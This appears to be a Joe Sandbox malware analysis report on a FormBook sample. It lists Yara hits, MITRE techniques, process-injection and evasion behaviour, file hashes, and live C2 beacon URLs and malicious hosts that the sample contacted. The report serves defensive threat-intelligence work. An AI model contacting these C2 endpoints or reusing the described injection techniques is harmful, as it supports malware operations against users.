Source: Yara match | File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Command and Scripting Interpreter2 | Path Interception | Process Injection512 | Masquerading1 | OS Credential Dumping | Security Software Discovery221 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion31 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection512 | NTDS | Application Window Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information4 | Cached Domain Credentials | System Information Discovery112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 528615 | Sample: HkE0tD0g4NXKJfy.exe | Startdate: 25/11/2021 | Architecture: WINDOWS | Score: 100

Graph nodes and edges (graph node ids in brackets):

• Start [2]: contacted www.vupeliquid.com, www.nbtianzhou.com, vupeliquid.com; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Found malware configuration, Malicious sample detected (through community Yara rule), 6 other signatures; started HkE0tD0g4NXKJfy.exe [11]
• HkE0tD0g4NXKJfy.exe [11]: dropped C:\Users\user\...\HkE0tD0g4NXKJfy.exe.log (ASCII); signature: Tries to detect virtualization through RDTSC time measurements; started HkE0tD0g4NXKJfy.exe [15]
• HkE0tD0g4NXKJfy.exe [15]: signatures: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Sample uses process hollowing technique, Queues an APC in another process (thread injection); injected into explorer.exe [18]
• explorer.exe [18] (injected): www.arsels.info 103.224.212.219, 49794, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia; www.xcgtsret.com; 12 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit); started msdt.exe [22]
• msdt.exe [22]: www.jakital.com; AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com; signatures: Self deletion via cmd delete, Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Tries to detect virtualization through RDTSC time measurements; started cmd.exe [26]
• cmd.exe [26]: started conhost.exe [28]


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
HkE0tD0g4NXKJfy.exe | 27% | ReversingLabs | Win32.Trojan.AgentTesla

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.jakital.com/ | 0% | Avira URL Cloud | safe
http://www.jakital.com/sh5d/?Yv=deNwNK4CD/WMHHT4cYNp3s43CKigm652n7BnZRGAFJqHojdiJSlOhFJhA2qOeK3G | 0% | Avira URL Cloud | safe
http://www.151motors.com/sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQX | 0% | Avira URL Cloud | safe
http://www.suepersoldiers.com/sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQX | 0% | Avira URL Cloud | safe
www.platinumcredit.net/sh5d/ | 0% | Avira URL Cloud | safe
http://www.vupeliquid.com/sh5d/?Yv=Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe&8pZ=MFQX | 0% | Avira URL Cloud | safe
http://www.arsels.info/sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX | 0% | Avira URL Cloud | safe
http://www.platinumcredit.net/sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQX | 0% | Avira URL Cloud | safe
http://www.electricatrick.com/sh5d/?Yv=bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S&8pZ=MFQX | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com | 52.204.216.132 | true | false |  | high
www.arsels.info | 103.224.212.219 | true | true |  | unknown
platinumcredit.net | 34.102.136.180 | true | false |  | unknown
electricatrick.com | 34.102.136.180 | true | false |  | unknown
151motors.com | 34.102.136.180 | true | false |  | unknown
vupeliquid.com | 34.102.136.180 | true | false |  | unknown
ghs.googlehosted.com | 142.250.203.115 | true | false |  | unknown
www.platinumcredit.net | unknown | unknown | true |  | unknown
www.thefullfledged.com | unknown | unknown | true |  | unknown
www.jakital.com | unknown | unknown | true |  | unknown
www.nbtianzhou.com | unknown | unknown | true |  | unknown
www.xcgtsret.com | unknown | unknown | true |  | unknown
www.151motors.com | unknown | unknown | true |  | unknown
www.suepersoldiers.com | unknown | unknown | true |  | unknown
www.vupeliquid.com | unknown | unknown | true |  | unknown
www.electricatrick.com | unknown | unknown | true |  | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.151motors.com/sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQX | false | Avira URL Cloud: safe | unknown
http://www.suepersoldiers.com/sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQX | false | Avira URL Cloud: safe | unknown
www.platinumcredit.net/sh5d/ | true | Avira URL Cloud: safe | low
http://www.vupeliquid.com/sh5d/?Yv=Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe&8pZ=MFQX | false | Avira URL Cloud: safe | unknown
http://www.arsels.info/sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX | true | Avira URL Cloud: safe | unknown
http://www.platinumcredit.net/sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQX | false | Avira URL Cloud: safe | unknown
http://www.electricatrick.com/sh5d/?Yv=bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S&8pZ=MFQX | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.jakital.com/ | msdt.exe, 0000000D.00000002.550615461.0000000000453000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jakital.com/sh5d/?Yv=deNwNK4CD/WMHHT4cYNp3s43CKigm652n7BnZRGAFJqHojdiJSlOhFJhA2qOeK3G | msdt.exe, 0000000D.00000002.550810990.0000000000475000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmp | false |  | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
142.250.203.115 | ghs.googlehosted.com | United States | 15169 | GOOGLEUS | false
34.102.136.180 | platinumcredit.net | United States | 15169 | GOOGLEUS | false
103.224.212.219 | www.arsels.info | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | true
52.204.216.132 | AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com | United States | 14618 | AMAZON-AESUS | false

                                            General Information

                                            Joe Sandbox Version: 34.0.0 Boulder Opal
                                            Analysis ID: 528615
                                            Start date: 25.11.2021
                                            Start time: 15:07:14
                                            Joe Sandbox Product: CloudBasic
                                            Overall analysis duration: 0h 10m 40s
                                            Hypervisor based Inspection enabled: false
                                            Report type: full
                                            Sample file name: HkE0tD0g4NXKJfy.exe
                                            Cookbook file name: default.jbs
                                            Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of new started processes analysed: 25
                                            Number of new started drivers analysed: 0
                                            Number of existing processes analysed: 0
                                            Number of existing drivers analysed: 0
                                            Number of injected processes analysed: 1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode: default
                                            Analysis stop reason: Timeout
                                            Detection: MAL
                                            Classification: mal100.troj.evad.winEXE@7/1@13/4
                                            EGA Information: Failed
                                            HDC Information:
                                            • Successful, ratio: 13.5% (good quality ratio 11.8%)
                                            • Quality average: 71.7%
                                            • Quality standard deviation: 32.9%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 84
                                            • Number of non-executed functions: 152
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                            • Not all processes were analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            Time | Type | Description
                                            15:08:09 | API Interceptor | 20x Sleep call for process: HkE0tD0g4NXKJfy.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            Match: 103.224.212.219
                                            Associated Sample Name / URL | Detection | Context
                                            11#U6708 16#U65e5 BL #U505a#U6cd5 SO NO J624 - #U9577#U5f91ISF DETAILS SO J624.exe | malicious | www.packyssportsbarandgrill.com/mc6b/?jHED=q6vdABYGr50+mpTbDuVjH2bXmj77a7qtsiv5Ksob526EgQZJ7eJZqZTBsliO0pE1Rz7dNSx2ew==&oDK8=OXptnZkP0zeTKbFp
                                            Company Profile.exe | malicious | www.alkalineup.info/dc02/?1bNDudv=+kLz+DEprIzY8U30IAWnamgEQgEGLSVbXudac2AKsepjAUwhwqfiCYTJlV+SA+9+XVAU&6lu=KlTl
                                            HIRE SOA NOV.exe | malicious | www.hugolabin.com/i44q/?7n=YS1dnbOkNaCP7JrmT7p6ZNFgGouLE1kKb8gf8ths3Yir/LKnwdmfPmrhsMehp4wjvOL3&b8DdKN=_b9DpJ
                                            RFQ - 1100195199 - 1100190814.exe | malicious | www.tattooof.info/nc26/?f48=ChB31lYopjmOZG3U73N52YTWorj0brdWeOA+REOz+6bldw4+nA/cQmaLai4MjdILtj65&4h50R=ABuLcpwXXr-
                                            November 2021 Update RFQ 3271737.exe | malicious | www.tattooof.info/nc26/?SBZL=ChB31lYopjmOZG3U73N52YTWorj0brdWeOA+REOz+6bldw4+nA/cQmaLai4m8t4Lphy5&D48=c2MHtVyHNxCxXp7
                                            32vCkFTS0X.exe | malicious | www.movieschor.info/qw2c/?gpt=rM2eMDGM2hRuqtSkQ+YMFWc5A7WJMLl7iFLKjR4Nu2Ciw4jbXpEUgw2kiN/aWqHDCAOD&g2=8pLpO
                                            #U570b#U5de8--#U6cf0#U91d1#U5bf6-EXW - ETC NOV. 5 - SO C360.exe | malicious | www.packyssportsbarandgrill.com/mc6b/?Fb20Btg=q6vdABYGr50+mpTbDuVjH2bXmj77a7qtsiv5Ksob526EgQZJ7eJZqZTBsmOeoYYOWGSM&R0D49=XvrtZ8lP082
                                            RFQ - 1100195199 - 1100190914.exe | malicious | www.tattooof.info/nc26/?k8GXjJk=ChB31lYopjmOZG3U73N52YTWorj0brdWeOA+REOz+6bldw4+nA/cQmaLai4MjdILtj65&9rhhPx=IL3h7ZC8a4ITG4S
                                            RFQ - 1100195199 - 1100190914.exe | malicious | www.tattooof.info/nc26/?I2J=ChB31lYopjmOZG3U73N52YTWorj0brdWeOA+REOz+6bldw4+nA/cQmaLai4m8t4Lphy5&4hL0lT=KZIPBrwH1Nx4PpRp
                                            RFQ_PI02102110.exe | malicious | www.decorationnews.com/rgv6/?p8eT=YMNzjXdfi635m3k1Gzxopc8L+wUwVg6cKWqi49UbKzMkwhAgUmt+0uJBtX6FQoP4iZ3i&C0=p4sD
                                            PO03214890.exe | malicious | www.decorationnews.com/rgv6/?I6bdp0F=YMNzjXdfi635m3k1Gzxopc8L+wUwVg6cKWqi49UbKzMkwhAgUmt+0uJBtUW/TpjDhuWz+/MrzQ==&uN90=Wv0xlDNhhL
                                            20210812GLL_pdf.exe | malicious | www.ptkvoice.com/zrmt/?iZG=ctrCe2mnbuueYdlFChD4/ovjSbegx+fsxvMp2r+zhNsJlDd5OS/NhYw/p1KrtWBZElqC&4hVP=u2JPvzz8
                                            SWIFT001411983HNK.exe | malicious | www.shortexts.com/epns/?6lS0=dI3Yf9uTZTAbXCF6BbS/gogk1F2wKsRWmNO0p//NNyZfeVIkQt6IT+pUp6SqlYDuC11l&hVW=UjWlVXm0fTLtynY
                                            TNT SHIPPING DOC 6753478364.exe | malicious | www.alldaazz.com/maw9/?0V0hlZ=XWXsKoTGIm4uHXuwUxI2SWJVNAtoSeX/AD8kJREhnqN4l6QppauIxxnj5QSnUcXcVB4L&OVolp8=AZ9lQ6QHS8EdPrG0
                                            L0CzpAvZC0.docm | malicious | wnc2sod.com/jivo/neky.php?l=wosam7.cab
                                            http://victoriascrets.com | malicious | victoriascrets.com/
                                            Nuevo orden.exe | malicious | www.bdcamp.com/fs8/?Rbd=M6AtZDq0P&sZ8p=NOEji/Y2mGsbH23/deqaMT6z03hOleRIA9g6aYtYA7Z0zE2bvyN9F2FNz4vb/LyrvrKV
                                            http://cootewie.com | malicious | cootewie.com/

                                            Domains

                                            Match: AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com
                                            Associated Sample Name / URL | Detection | Context
                                            PO11232021.xlsx | malicious | 54.159.173.74
                                            3543lZhfll.exe | malicious | 54.211.95.91

                                            ASN

                                            Match: AMAZON-AESUS
                                            Associated Sample Name / URL | Detection | Context
                                            2HFJezUWHA.exe | malicious | 52.20.78.240
                                            QZLQkiS4nj.exe | malicious | 52.20.78.240
                                            Jx35I5pwgd | malicious | 54.167.122.21
                                            meerkat.x86 | malicious | 34.228.218.187
                                            invoice copy.pdf.exe | malicious | 52.200.197.31
                                            mal1.html | malicious | 23.20.158.212
                                            oQANZnrt9d | malicious | 54.34.104.203
                                            KWDww9OWgh | malicious | 44.207.141.47
                                            TwikaSb2s6 | malicious | 54.204.237.164
                                            TWb3IVgBOQ.exe | malicious | 35.169.3.110
                                            sora.x86 | malicious | 54.62.131.219
                                            a.dll | malicious | 44.200.20.85
                                            New Order778880.exe | malicious | 3.209.180.95
                                            B67M2Q6NeK | malicious | 44.194.145.165
                                            c0az1l4js3001lsk4xd9n.arm7-20211124-0850 | malicious | 44.207.229.114
                                            c0az1l4js3001lsk4xd9n.arm-20211124-0850 | malicious | 34.231.85.166
                                            0617_1876522156924.doc | malicious | 54.91.59.199
                                            C594188774A2D72B774ACA96EB096C493DBE5C9B599BE.exe | malicious | 54.83.52.76
                                            x86_64-20211124-0649 | malicious | 54.210.131.199
                                            jLvGTP8xik | malicious | 34.235.189.214

                                            Match: TRELLIAN-AS-APTrellianPtyLimitedAU
                                            Associated Sample Name / URL | Detection | Context
                                            piPvSLcFXV.exe | malicious | 103.224.212.220
                                            Env#U00edo diciembre.exe | malicious | 103.224.182.253
                                            IAENMAI.xlsx | malicious | 103.224.182.210
                                            SecuriteInfo.com.Trojan.Siggen15.46065.1499.exe | malicious | 103.224.182.246
                                            MDXAR5336e.exe | malicious | 103.224.212.222
                                            7OjVU04f8q.exe | malicious | 103.224.212.222
                                            rfq.exe | malicious | 103.224.212.220
                                            Scan-Copy.doc | malicious | 103.224.182.242
                                            11#U6708 16#U65e5 BL #U505a#U6cd5 SO NO J624 - #U9577#U5f91ISF DETAILS SO J624.exe | malicious | 103.224.212.219
                                            PO AMO 8100045923.xlsx | malicious | 103.224.212.221
                                            Company Profile.exe | malicious | 103.224.212.219
                                            XL9048621.exe | malicious | 103.224.182.210
                                            goGZ1Tg0WT.exe | malicious | 103.224.212.220
                                            BwJriVGrt5.exe | malicious | 103.224.182.208
                                            RQF_190011234.doc | malicious | 103.224.212.221
                                            HIRE SOA NOV.exe | malicious | 103.224.212.219
                                            RFQ - JAKOB SELMER_pdf.exe | malicious | 103.224.212.220
                                            Quote request.exe | malicious | 103.224.212.220
                                            Purchase Order - 10,000MT.exe | malicious | 103.224.212.221
                                            copy.exe | malicious | 103.224.182.242

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HkE0tD0g4NXKJfy.exe.log
                                            Process: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
                                            File Type: ASCII text, with CRLF line terminators
                                            Category: dropped
                                            Size (bytes): 2239
                                            Entropy (8bit): 5.354287817410997
                                            Encrypted: false
                                            SSDEEP: 48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                                            MD5: 913D1EEA179415C6D08FB255AE42B99D
                                            SHA1: E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                                            SHA-256: 473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                                            SHA-512: 768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                                            Malicious: true
                                            Reputation: moderate, very likely benign file
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                            Static File Info

                                            General

                                            File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit): 7.841777584881155
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name: HkE0tD0g4NXKJfy.exe
                                            File size: 446976
                                            MD5: fcc2d1cda8d3989feca9c5f5f900e164
                                            SHA1: 075de723df172cc93c537d5472ad8025f192ddc8
                                            SHA256: 77e1c24ecfa1d339f61b4b8011690425fa0038b3fe32761f5ce8b3126c28c5ad
                                            SHA512: 25f45048ee6bc9164177634d6e4b9f4d3aac06d4d305aa25c16eaf8cf2169767f86cd2879ddabe2e49d8fd38b0a50e115b1735da5a4600ec8c1e243bff2b4863
                                            SSDEEP: 12288:wdmXM0WMbeBBYMtWpeUjxU9sQ+WYU1y1wjlvixBFm:wdoM0yGptdU9+WYkvjlvi1
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-O.a..............0.............B.... ........@.. .......................@............@................................

                                            File Icon

                                            Icon Hash: 00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint: 0x46e642
                                            Entrypoint Section: .text
                                            Digitally signed: false
                                            Imagebase: 0x400000
                                            Subsystem: windows gui
                                            Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp: 0x619F4F2D [Thu Nov 25 08:54:05 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version: v4.0.30319
                                            OS Version Major: 4
                                            OS Version Minor: 0
                                            File Version Major: 4
                                            File Version Minor: 0
                                            Subsystem Version Major: 4
                                            Subsystem Version Minor: 0
                                            Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [ebp+0800000Eh], ch
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
